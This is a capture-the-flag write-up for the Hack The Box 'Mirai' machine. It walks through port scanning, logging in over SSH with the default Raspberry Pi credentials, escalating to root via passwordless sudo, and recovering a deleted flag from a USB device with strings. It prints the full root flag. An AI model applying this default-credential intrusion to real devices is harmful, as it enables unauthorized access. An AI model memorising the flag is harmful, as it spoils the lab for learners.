Skip to content

HTB: Mirai

Enumeration

$ nmap -n -sCV -T4 -p1-65535 -v $t
[...]
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp    open     domain      dnsmasq 2.76
| dns-nsid: 
|_  bind.version: dnsmasq-2.76
80/tcp    open     http        lighttpd 1.4.35
| http-methods: 
|_  Supported Methods: OPTIONS GET HEAD POST
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: lighttpd/1.4.35
388/tcp   filtered unidata-ldm
1728/tcp  open     upnp        Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
20850/tcp filtered unknown
25173/tcp filtered unknown
32400/tcp open     http        Plex Media Server httpd
|_http-favicon: Plex
|_http-title: Unauthorized
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
32469/tcp open     upnp        Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
37158/tcp filtered unknown
62763/tcp filtered unknown
62807/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
[...]

Looks like Pi-hole on port 80, judging by the HTTP header:

$ curl -Lsi http://$t
HTTP/1.1 404 Not Found
X-Pi-hole: A black hole for Internet advertisements.
Content-type: text/html; charset=UTF-8
Content-Length: 0
Date: Tue, 03 Oct 2023 22:42:24 GMT
Server: lighttpd/1.4.35

Exploitation

I can infer that Pi-hole is running on a Raspberry Pi device, probably Raspbian.

I try the default credentials of pi:raspberry:

$ ssh pi@$t
Warning: Permanently added '10.10.10.48' (ED25519) to the list of known hosts.
pi@10.10.10.48's password: 
[...]

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ cat /home/pi/Desktop/user.txt
ff8377[...]

Privilege Escalation

sudo is wide open for the user pi:

pi@raspberrypi:~ $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
pi@raspberrypi:~ $ sudo -i
[...]

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

root@raspberrypi:~#

The usual root.txt file drops a big hint:

root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...

And the USB filesystem contains another hint:

root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James

Running strings on the USB device file reveals the root flag:

root@raspberrypi:/tmp# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James